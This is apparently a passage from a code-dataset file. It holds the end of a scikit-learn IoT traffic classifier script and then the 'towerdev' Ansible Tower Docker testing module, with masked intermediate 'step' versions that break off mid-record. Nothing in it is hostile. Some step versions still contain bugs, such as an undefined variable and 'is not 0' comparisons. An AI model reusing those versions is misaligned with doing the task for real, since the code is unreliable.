return (model)\n\n\ndef svm_2(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=2, random_state=0)\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef svm_3(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=3, random_state=0)\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef svm_4(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=4, random_state=0)\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef svm_5(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=5, random_state=0)\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef svm_6(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=6, random_state=0)\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef svm_7(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=7, random_state=0)\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef svm_8(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=8, random_state=0)\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef logisticRegression(X_train, y_train):\n model = LogisticRegression(class_weight='balanced')\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef passiveAggressiveClassifier(X_train, y_train):\n model = PassiveAggressiveClassifier(max_iter=1000, random_state=0, tol=1e-3, class_weight='balanced')\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef svm_rbf(X_train, y_train):\n model = SVC(kernel='rbf', class_weight='balanced')\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef random_forest(X_train, y_train):\n model = RandomForestClassifier(n_estimators=100, max_depth=2, random_state=0, class_weight='balanced')\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef ridgeClassifierCV(X_train, y_train):\n model = 
RidgeClassifierCV(alphas=[1e-3, 1e-2, 1e-1, 1], class_weight='balanced')\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef evaluation_result(y_test, y_pred, model):\n cnf_matrix = confusion_matrix(y_test, y_pred, labels=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12])\n print(cnf_matrix)\n\n FP = cnf_matrix.sum(axis=0) - np.diag(cnf_matrix)\n FN = cnf_matrix.sum(axis=1) - np.diag(cnf_matrix)\n TP = np.diag(cnf_matrix)\n TN = cnf_matrix.sum() - (FP + FN + TP)\n\n FP = FP.astype(int)\n FN = FN.astype(int)\n TP = TP.astype(int)\n TN = TN.astype(int)\n print(TP, TN, FP, FN)\n\n evaluation_path = 'C:/penv/unsw/csvfiles/labeled/count/useractivity/evaluation/'\n for i in range(0, 13):\n with open(evaluation_path + str(i) + '.csv', 'a') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow([model, TP[i], FN[i], TN[i], FP[i]])\n csvfile.close()\n\n\n#\n\n\ndata = pd.read_csv(\"C:/penv/unsw/csvfiles/labeled/count/useractivity/new.csv\")\ndata = data.dropna()\n\nfeature_cols = ['Size', 'Amazon Echo', 'Belkin Motion',\n 'Belkin Switch', 'Blipcare BloodPressure Meter', 'HP Printer', 'Dropcam', 'Insteon Camera',\n 'LIFX Smart Bulb', 'NEST Smoke Alarm', 'Netatmo Welcome Camera', 'Netatmo Weather Station',\n 'PIX-STAR Photo-frame', 'Samsung SmartCam', 'Smart Things', 'TP-Link Day Night Cloud camera',\n 'TP-Link Smart plug', 'Triby Speaker', 'Withings Smart Baby Monitor', 'Withings Smart scale',\n 'Withings Aura smart sleep sensor', 'iHome Plug', 'Samsung Galaxy Tab', 'Android Phone 1',\n 'Laptop', 'MacBook', 'Android Phone 2', 'iPhone', 'MacBook/iPhone']\n# feature_cols = [ 'Amazon Echo', 'Belkin Motion',\n# 'Belkin Switch','Blipcare BloodPressure Meter','HP Printer','Dropcam','Insteon Camera',\n# 'LIFX Smart Bulb', 'NEST Smoke Alarm','Netatmo Welcome Camera', 'Netatmo Weather Station',\n# 'PIX-STAR Photo-frame','Samsung SmartCam','Smart Things', 'TP-Link Day Night Cloud camera',\n# 'TP-Link Smart plug','Triby Speaker','Withings Smart Baby Monitor','Withings Smart 
scale',\n# 'Withings Aura smart sleep sensor','iHome Plug', 'Samsung Galaxy Tab', 'Android Phone 1',\n# 'Laptop', 'MacBook', 'Android Phone 2','iPhone','MacBookiPhone']\n# feature_cols = ['Size']\nX = data[feature_cols]\nscaler = StandardScaler()\nX = scaler.fit_transform(X) # Features\ny = data['User Activity'] # Target variable\n\n# instantiate the model (using the default parameters)\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30)\n\n# d = [decisionTree, logisticRegression,knn, svm_linear, svm_2,svm_3,svm_rbf,ridgeClassifierCV,naiveBayes,cnn_3layers,random_forest]\nmodel = decisionTree(X_train, y_train)\ny_pred = model.predict(X_test)\nevaluation_result(y_test, y_pred, 'decisionTree')\n\nmodel = logisticRegression(X_train, y_train)\ny_pred = model.predict(X_test)\nevaluation_result(y_test, y_pred, 'logisticRegression')\n\nmodel = knn(X_train, y_train)\ny_pred = model.predict(X_test)\nevaluation_result(y_test, y_pred, 'knn')\n\nmodel = svm_linear(X_train, y_train)\ny_pred = model.predict(X_test)\nevaluation_result(y_test, y_pred, 'svm_linear')\n\nmodel = svm_2(X_train, y_train)\ny_pred = model.predict(X_test)\nevaluation_result(y_test, y_pred, 'svm_2')\n\nmodel = svm_3(X_train, y_train)\ny_pred = model.predict(X_test)\nevaluation_result(y_test, y_pred, 'svm_3')\n\nmodel = svm_rbf(X_train, y_train)\ny_pred = model.predict(X_test)\nevaluation_result(y_test, y_pred, 'svm_rbf')\n\nmodel = naiveBayes(X_train, y_train)\ny_pred = model.predict(X_test)\nevaluation_result(y_test, y_pred, 'naiveBayes')\n\nmodel = random_forest(X_train, y_train)\ny_pred = model.predict(X_test)\nevaluation_result(y_test, y_pred, 'random_forest')\n\nmodel = ridgeClassifierCV(X_train, y_train)\ny_pred = model.predict(X_test)\nevaluation_result(y_test, y_pred, 'ridgeClassifierCV')\n\nmodel = passiveAggressiveClassifier(X_train, y_train)\ny_pred = model.predict(X_test)\nevaluation_result(y_test, y_pred, 
'passiveAggressiveClassifier')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n",
"step-ids": [
13,
14,
16,
17,
21
]
}
|
[
13,
14,
16,
17,
21
] |
#!/usr/bin/env python3
''' towerdev - Ansible Tower Testing Framework
MIT License
Copyright © 2021 falcon78921
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import towerdev.common
import towerdev.utilities
from colors import *
# Module-level Docker client, created once at import time and shared by every
# helper in this file (runContainer, runContainerCluster, ...).
# NOTE(review): instantiating at import means importing this module requires a
# reachable Docker daemon — presumably intentional for this test framework.
dockerClient = towerdev.common.dockerClient()
def runContainer(purpose, externalPort, osVersion, containerName, debug=True, **kwargs):
    """Run a supplemental container from a pre-existing image.

    Parameters:
        purpose (str): role of the container; only "ssh" is currently handled.
        externalPort: host port mapped to the container's 22/tcp.
        osVersion (str): "centos7" or "centos8"; selects the systemd image.
        containerName (str): name assigned to the new container.
        debug (bool): when True, print the options this call was made with.
        **kwargs: accepted for forward compatibility; currently unused.

    Returns:
        bool: True if exactly one container matching ``containerName`` is
        running after the attempt, False otherwise.
    """
    # Optional debug that prints a dict of options
    if debug:
        runSpecialOpts = dict(purpose=purpose, externalPort=externalPort, osVersion=osVersion, containerName=containerName)
        print(runSpecialOpts)

    if purpose == "ssh":
        # The two OS variants differed only in image name; table lookup
        # replaces the duplicated run() calls.
        images = {'centos7': 'centos7/systemd', 'centos8': 'centos8/systemd'}
        image = images.get(osVersion)
        if image is not None:
            dockerClient.containers.run(
                image,
                privileged=False,
                volumes={'/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'}},
                tmpfs={'/tmp': 'exec', '/run': ''},
                detach=True,
                name=containerName,
                ports={'22/tcp': externalPort},
            )

    # Success == exactly one container with the requested name exists.
    containersList = dockerClient.containers.list(filters={'name': containerName})
    return len(containersList) == 1
def runContainerCluster(towerVersion, osVersion, namingConvention, stream=True, **kwargs):
    """Run Tower containers in a clustered setup.

    Starts `containerCount` Tower containers named "<namingConvention>-<n>",
    rewrites the setup inventory inside the first cluster member for the
    detected Tower minor version (3.5.x-3.8.x), then runs ./setup.sh on the
    last member, optionally streaming its output.

    Parameters:
        towerVersion (str): Tower version whose image/installer to use.
        osVersion (str): base OS flavor, passed through to runTowerContainer().
        namingConvention (str): prefix for the generated container names.
        stream (bool): when True, stream ./setup.sh output line by line via
            the low-level API; otherwise run it blocking with exec_run().

    Returns:
        bool: True when the full set of containers is up and ./setup.sh
        exited 0; False otherwise (including when no image exists for
        towerVersion).
    """
    # runContainerCluster() defaults; intended to be overridable via **kwargs.
    externalPort = None
    containerCount = 3
    debug = True
    loadBalance = False
    # Optional debug that prints a dict of options
    if debug:
        runClusterOpts = dict(towerVersion=towerVersion, osVersion=osVersion,
                              loadBalance=loadBalance, namingConvention=namingConvention,
                              externalPort=externalPort, containerCount=containerCount,
                              debug=debug)
        print(runClusterOpts)
    # Bail out early if no image has been built for this Tower version.
    if towerdev.utilities.imageCheck(towerVersion) is False:
        print(color("ERROR: Deployment of container cluster failed. Please make sure the specified version of Tower has an image built.", fg="red"))
        return False
    for c in range(containerCount):
        runTowerContainer(towerVersion=towerVersion, externalPort=externalPort,
                          osVersion=osVersion,
                          containerName="{0}-{1}".format(namingConvention, c))
    clusterContainers = dockerClient.containers.list(filters={'name': '{0}-*'.format(namingConvention)})
    # Gather container IPs for inventory fillout.
    containerIps = [c.attrs['NetworkSettings']['IPAddress'] for c in clusterContainers]
    print(clusterContainers[0])
    # Choose the version-specific cluster inventory file. The four original
    # branches were identical apart from the minor-version string.
    for minorVersion in ('3.5', '3.6', '3.7', '3.8'):
        if minorVersion in towerVersion:
            chooseInventoryCmd = ('mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_{1}.x '
                                  '/opt/ansible-tower-setup-{0}-1/inventory').format(towerVersion, minorVersion)
            clusterContainers[0].exec_run(cmd=chooseInventoryCmd)
            break
    # Messaging/addressing host variable depends on the Tower generation:
    # 3.5/3.6 use rabbitmq_host, 3.7/3.8 use routable_hostname.
    if '3.5' in towerVersion or '3.6' in towerVersion:
        hostVariable = 'rabbitmq_host'
    elif '3.7' in towerVersion or '3.8' in towerVersion:
        hostVariable = 'routable_hostname'
    else:
        hostVariable = None
    if hostVariable is not None:
        for ip in containerIps:
            modifyInventoryCmd = ('sed -i "2i{0} {1}={0}" '
                                  '/opt/ansible-tower-setup-{2}-1/inventory').format(ip, hostVariable, towerVersion)
            clusterContainers[0].exec_run(cmd=modifyInventoryCmd)
    # Commands for the (optionally load-balanced) ./setup.sh invocation.
    setupCmd = '/bin/bash -c "cd /opt/ansible-tower-setup-{0}-1 && ./setup.sh"'.format(towerVersion)
    setupLbCmd = '/bin/bash -c "cd /opt/ansible-tower-setup-{0}-1 && ./setup.sh -e nginx_disable_https=true"'.format(towerVersion)
    # Fill in the version-derived database-name placeholder in the inventory.
    inventoryDbVersion = towerVersion.replace(".", "")
    modifyInventoryDbCmd = "sed -i 's/XXX/{0}/g' /opt/ansible-tower-setup-{1}-1/inventory".format(inventoryDbVersion, towerVersion)
    clusterContainers[0].exec_run(cmd=modifyInventoryDbCmd)
    if loadBalance:
        activeSetupCmd = setupLbCmd
        print(color("INFO: Running ./setup.sh with load balance configuration...", fg="yellow"))
    else:
        activeSetupCmd = setupCmd
        print(color("INFO: Running ./setup.sh with no load balance configuration...", fg="yellow"))
    lastIndex = len(clusterContainers) - 1
    if stream:
        # Stream ./setup.sh output from the last cluster member via the
        # low-level API so installer progress is visible line by line.
        lowLevelClient = towerdev.common.apiClient()
        createExec = lowLevelClient.exec_create(container="{0}-{1}".format(namingConvention, lastIndex), cmd=activeSetupCmd)
        for line in lowLevelClient.exec_start(exec_id=createExec['Id'], stream=True, detach=False):
            print(line.decode('utf-8'))
        setupCmdCode = lowLevelClient.exec_inspect(exec_id=createExec['Id'])['ExitCode']
    else:
        # BUG FIX: the original referenced an undefined `towerContainer` here
        # (NameError) and later indexed the streamed generator (TypeError);
        # run ./setup.sh on the last member and take ExecResult's exit code.
        runSetupCmd = clusterContainers[lastIndex].exec_run(cmd=activeSetupCmd)
        setupCmdCode = runSetupCmd[0]
    containersList = dockerClient.containers.list(filters={'name': '{0}-*'.format(namingConvention)})
    # Success requires a full set of containers AND a zero ./setup.sh exit code.
    # (The original compared exit codes with `is not 0`; use != for value equality.)
    clusterStatus = len(containersList) == containerCount and setupCmdCode == 0
    return clusterStatus
def runTowerContainer(towerVersion, externalPort, osVersion, containerName, debug=False, **kwargs):
    """Run an Ansible Tower container from a pre-existing image.

    Parameters:
        towerVersion (str): image tag, i.e. the Tower version to run.
        externalPort: host port to publish 443/tcp on; falsy means let
            Docker pick an ephemeral host port.
        osVersion (str): base OS flavor, selects the "ansibletower/<os>" repo.
        containerName (str): name to assign to the new container.
        debug (bool): when True, print the effective options before running.

    Returns:
        bool: True when exactly one container matching containerName is
        listed afterwards, False otherwise.
    """
    # Optional memory cap for the container; None means no limit is applied.
    allowedMemory = None
    # Optional debug that prints a dict of options
    if debug:
        runOpts = dict(towerVersion=towerVersion, externalPort=externalPort,
                       osVersion=osVersion, containerName=containerName)
        print(runOpts)
    # Build the run() options once instead of duplicating the call four times.
    runKwargs = dict(privileged=False,
                     volumes={'/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'}},
                     tmpfs={'/tmp': 'exec', '/run': ''},
                     detach=True,
                     name=containerName,
                     # Falsy externalPort -> publish 443/tcp on a random host port.
                     ports={'443/tcp': externalPort if externalPort else None})
    if allowedMemory is not None:
        runKwargs['mem_limit'] = allowedMemory
    towerContainer = dockerClient.containers.run(
        'ansibletower/{0}:{1}'.format(osVersion, towerVersion), **runKwargs)
    # Creation succeeded iff exactly one container with this name is now listed.
    containersList = dockerClient.containers.list(filters={'name': containerName})
    return len(containersList) == 1
|
normal
|
{
"blob_id": "63e28e6a1ea5db1d1c41bbc755b9c33905e066bb",
"index": 9832,
"step-1": "<mask token>\n\n\ndef runTowerContainer(towerVersion, externalPort, osVersion, containerName,\n debug=False, **kwargs):\n \"\"\"Runs Tower container from pre-existing image\"\"\"\n allowedMemory = None\n if debug == True:\n runOpts = dict(towerVersion=towerVersion, externalPort=externalPort,\n osVersion=osVersion, containerName=containerName)\n print(runOpts)\n if not externalPort:\n if allowedMemory is not None:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes\n ={'/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'\n }}, tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, mem_limit=allowedMemory, ports={'443/tcp': None}\n )\n else:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes\n ={'/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'\n }}, tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, ports={'443/tcp': None})\n elif allowedMemory is not None:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes={\n '/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'}},\n tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, mem_limit=allowedMemory, ports={'443/tcp':\n externalPort})\n else:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes={\n '/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'}},\n tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, ports={'443/tcp': externalPort})\n containersList = dockerClient.containers.list(filters={'name':\n containerName})\n if len(containersList) == 1:\n creationStatus = True\n else:\n creationStatus = False\n return creationStatus\n",
"step-2": "<mask token>\n\n\ndef runContainer(purpose, externalPort, osVersion, containerName, debug=\n True, **kwargs):\n \"\"\"Run supplemental container from pre-existing image\"\"\"\n if debug == True:\n runSpecialOpts = dict(purpose=purpose, externalPort=externalPort,\n osVersion=osVersion, containerName=containerName)\n print(runSpecialOpts)\n if purpose == 'ssh':\n if osVersion == 'centos7':\n sshContainer = dockerClient.containers.run('centos7/systemd',\n privileged=False, volumes={'/sys/fs/cgroup': {'bind':\n '/sys/fs/cgroup', 'mode': 'ro'}}, tmpfs={'/tmp': 'exec',\n '/run': ''}, detach=True, name=containerName, ports={\n '22/tcp': externalPort})\n elif osVersion == 'centos8':\n sshContainer = dockerClient.containers.run('centos8/systemd',\n privileged=False, volumes={'/sys/fs/cgroup': {'bind':\n '/sys/fs/cgroup', 'mode': 'ro'}}, tmpfs={'/tmp': 'exec',\n '/run': ''}, detach=True, name=containerName, ports={\n '22/tcp': externalPort})\n containersList = dockerClient.containers.list(filters={'name':\n containerName})\n if len(containersList) == 1:\n creationStatus = True\n else:\n creationStatus = False\n return creationStatus\n\n\ndef runContainerCluster(towerVersion, osVersion, namingConvention, stream=\n True, **kwargs):\n \"\"\"Run Tower containers in a clustered setup\"\"\"\n externalPort = None\n containerCount = 3\n debug = True\n loadBalance = False\n if debug:\n runClusterOpts = dict(towerVersion=towerVersion, osVersion=\n osVersion, loadBalance=loadBalance, namingConvention=\n namingConvention, externalPort=externalPort, containerCount=\n containerCount, debug=debug)\n print(runClusterOpts)\n check = towerdev.utilities.imageCheck(towerVersion)\n if check is False:\n print(color(\n 'ERROR: Deployment of container cluster failed. 
Please make sure the specified version of Tower has an image built.'\n , fg='red'))\n return False\n else:\n for c in range(containerCount):\n runTowerContainer(towerVersion=towerVersion, externalPort=\n externalPort, osVersion=osVersion, containerName='{0}-{1}'.\n format(namingConvention, c))\n clusterContainers = dockerClient.containers.list(filters={'name':\n '{0}-*'.format(namingConvention)})\n containerIps = []\n for c in range(len(clusterContainers)):\n containerIp = clusterContainers[c].attrs['NetworkSettings']['IPAddress'\n ]\n containerIps.append(containerIp)\n print(clusterContainers[0])\n if '3.5' in towerVersion:\n chooseInventoryCmd = (\n 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.5.x /opt/ansible-tower-setup-{0}-1/inventory'\n .format(towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n elif '3.6' in towerVersion:\n chooseInventoryCmd = (\n 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.6.x /opt/ansible-tower-setup-{0}-1/inventory'\n .format(towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n elif '3.7' in towerVersion:\n chooseInventoryCmd = (\n 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.7.x /opt/ansible-tower-setup-{0}-1/inventory'\n .format(towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n elif '3.8' in towerVersion:\n chooseInventoryCmd = (\n 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.8.x /opt/ansible-tower-setup-{0}-1/inventory'\n .format(towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n if '3.5' in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = (\n 'sed -i \"2i{0} rabbitmq_host={0}\" /opt/ansible-tower-setup-{1}-1/inventory'\n .format(i, towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=\n modifyInventoryCmd)\n elif '3.6' in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = (\n 'sed -i \"2i{0} 
rabbitmq_host={0}\" /opt/ansible-tower-setup-{1}-1/inventory'\n .format(i, towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=\n modifyInventoryCmd)\n elif '3.7' in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = (\n 'sed -i \"2i{0} routable_hostname={0}\" /opt/ansible-tower-setup-{1}-1/inventory'\n .format(i, towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=\n modifyInventoryCmd)\n elif '3.8' in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = (\n 'sed -i \"2i{0} routable_hostname={0}\" /opt/ansible-tower-setup-{1}-1/inventory'\n .format(i, towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=\n modifyInventoryCmd)\n setupCmd = (\n '/bin/bash -c \"cd /opt/ansible-tower-setup-{0}-1 && ./setup.sh\"'.\n format(towerVersion))\n setupLbCmd = (\n '/bin/bash -c \"cd /opt/ansible-tower-setup-{0}-1 && ./setup.sh -e nginx_disable_https=true\"'\n .format(towerVersion))\n inventoryDbVersion = towerVersion.replace('.', '')\n modifyInventoryDbCmd = (\n \"sed -i 's/XXX/{0}/g' /opt/ansible-tower-setup-{1}-1/inventory\".\n format(inventoryDbVersion, towerVersion))\n runDatabaseCmd = clusterContainers[0].exec_run(cmd=modifyInventoryDbCmd)\n if loadBalance:\n print(color(\n 'INFO: Running ./setup.sh with load balance configuration...',\n fg='yellow'))\n if stream:\n lowLevelClient = towerdev.common.apiClient()\n calcRunContainer = len(clusterContainers) - 1\n createExec = lowLevelClient.exec_create(container='{0}-{1}'.\n format(namingConvention, calcRunContainer), cmd=setupLbCmd)\n runSetupCmd = lowLevelClient.exec_start(exec_id=createExec['Id'\n ], stream=True, detach=False)\n for line in runSetupCmd:\n print(line.decode('utf-8'))\n inspect = lowLevelClient.exec_inspect(exec_id=createExec['Id'])\n setupCmdCode = inspect['ExitCode']\n containersList = dockerClient.containers.list(filters={'name':\n '{0}-*'.format(namingConvention)})\n if len(containersList) == containerCount:\n clusterStatus = True\n 
else:\n clusterStatus = False\n if setupCmdCode is not 0:\n clusterStatus = False\n else:\n runSetupCmd = towerContainer.exec_run(cmd=setupLbCmd)\n else:\n print(color(\n 'INFO: Running ./setup.sh with no load balance configuration...',\n fg='yellow'))\n if stream:\n lowLevelClient = towerdev.common.apiClient()\n calcRunContainer = len(clusterContainers) - 1\n createExec = lowLevelClient.exec_create(container='{0}-{1}'.\n format(namingConvention, calcRunContainer), cmd=setupCmd)\n runSetupCmd = lowLevelClient.exec_start(exec_id=createExec['Id'\n ], stream=True, detach=False)\n for line in runSetupCmd:\n print(line.decode('utf-8'))\n inspect = lowLevelClient.exec_inspect(exec_id=createExec['Id'])\n setupCmdCode = inspect['ExitCode']\n containersList = dockerClient.containers.list(filters={'name':\n '{0}-*'.format(namingConvention)})\n if len(containersList) == containerCount:\n clusterStatus = True\n else:\n clusterStatus = False\n if setupCmdCode is not 0:\n clusterStatus = False\n else:\n runSetupCmd = towerContainer.exec_run(cmd=setupCmd)\n containersList = dockerClient.containers.list(filters={'name':\n '{0}-*'.format(namingConvention)})\n if len(containersList) == containerCount:\n clusterStatus = True\n else:\n clusterStatus = False\n if runSetupCmd[0] is not 0:\n clusterStatus = False\n return clusterStatus\n\n\ndef runTowerContainer(towerVersion, externalPort, osVersion, containerName,\n debug=False, **kwargs):\n \"\"\"Runs Tower container from pre-existing image\"\"\"\n allowedMemory = None\n if debug == True:\n runOpts = dict(towerVersion=towerVersion, externalPort=externalPort,\n osVersion=osVersion, containerName=containerName)\n print(runOpts)\n if not externalPort:\n if allowedMemory is not None:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes\n ={'/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'\n }}, tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n 
containerName, mem_limit=allowedMemory, ports={'443/tcp': None}\n )\n else:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes\n ={'/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'\n }}, tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, ports={'443/tcp': None})\n elif allowedMemory is not None:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes={\n '/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'}},\n tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, mem_limit=allowedMemory, ports={'443/tcp':\n externalPort})\n else:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes={\n '/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'}},\n tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, ports={'443/tcp': externalPort})\n containersList = dockerClient.containers.list(filters={'name':\n containerName})\n if len(containersList) == 1:\n creationStatus = True\n else:\n creationStatus = False\n return creationStatus\n",
"step-3": "<mask token>\ndockerClient = towerdev.common.dockerClient()\n\n\ndef runContainer(purpose, externalPort, osVersion, containerName, debug=\n True, **kwargs):\n \"\"\"Run supplemental container from pre-existing image\"\"\"\n if debug == True:\n runSpecialOpts = dict(purpose=purpose, externalPort=externalPort,\n osVersion=osVersion, containerName=containerName)\n print(runSpecialOpts)\n if purpose == 'ssh':\n if osVersion == 'centos7':\n sshContainer = dockerClient.containers.run('centos7/systemd',\n privileged=False, volumes={'/sys/fs/cgroup': {'bind':\n '/sys/fs/cgroup', 'mode': 'ro'}}, tmpfs={'/tmp': 'exec',\n '/run': ''}, detach=True, name=containerName, ports={\n '22/tcp': externalPort})\n elif osVersion == 'centos8':\n sshContainer = dockerClient.containers.run('centos8/systemd',\n privileged=False, volumes={'/sys/fs/cgroup': {'bind':\n '/sys/fs/cgroup', 'mode': 'ro'}}, tmpfs={'/tmp': 'exec',\n '/run': ''}, detach=True, name=containerName, ports={\n '22/tcp': externalPort})\n containersList = dockerClient.containers.list(filters={'name':\n containerName})\n if len(containersList) == 1:\n creationStatus = True\n else:\n creationStatus = False\n return creationStatus\n\n\ndef runContainerCluster(towerVersion, osVersion, namingConvention, stream=\n True, **kwargs):\n \"\"\"Run Tower containers in a clustered setup\"\"\"\n externalPort = None\n containerCount = 3\n debug = True\n loadBalance = False\n if debug:\n runClusterOpts = dict(towerVersion=towerVersion, osVersion=\n osVersion, loadBalance=loadBalance, namingConvention=\n namingConvention, externalPort=externalPort, containerCount=\n containerCount, debug=debug)\n print(runClusterOpts)\n check = towerdev.utilities.imageCheck(towerVersion)\n if check is False:\n print(color(\n 'ERROR: Deployment of container cluster failed. 
Please make sure the specified version of Tower has an image built.'\n , fg='red'))\n return False\n else:\n for c in range(containerCount):\n runTowerContainer(towerVersion=towerVersion, externalPort=\n externalPort, osVersion=osVersion, containerName='{0}-{1}'.\n format(namingConvention, c))\n clusterContainers = dockerClient.containers.list(filters={'name':\n '{0}-*'.format(namingConvention)})\n containerIps = []\n for c in range(len(clusterContainers)):\n containerIp = clusterContainers[c].attrs['NetworkSettings']['IPAddress'\n ]\n containerIps.append(containerIp)\n print(clusterContainers[0])\n if '3.5' in towerVersion:\n chooseInventoryCmd = (\n 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.5.x /opt/ansible-tower-setup-{0}-1/inventory'\n .format(towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n elif '3.6' in towerVersion:\n chooseInventoryCmd = (\n 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.6.x /opt/ansible-tower-setup-{0}-1/inventory'\n .format(towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n elif '3.7' in towerVersion:\n chooseInventoryCmd = (\n 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.7.x /opt/ansible-tower-setup-{0}-1/inventory'\n .format(towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n elif '3.8' in towerVersion:\n chooseInventoryCmd = (\n 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.8.x /opt/ansible-tower-setup-{0}-1/inventory'\n .format(towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n if '3.5' in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = (\n 'sed -i \"2i{0} rabbitmq_host={0}\" /opt/ansible-tower-setup-{1}-1/inventory'\n .format(i, towerVersion))\n runInventoryCmd = clusterContainers[0].exec_run(cmd=\n modifyInventoryCmd)\n elif '3.6' in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = (\n 'sed -i \"2i{0} 
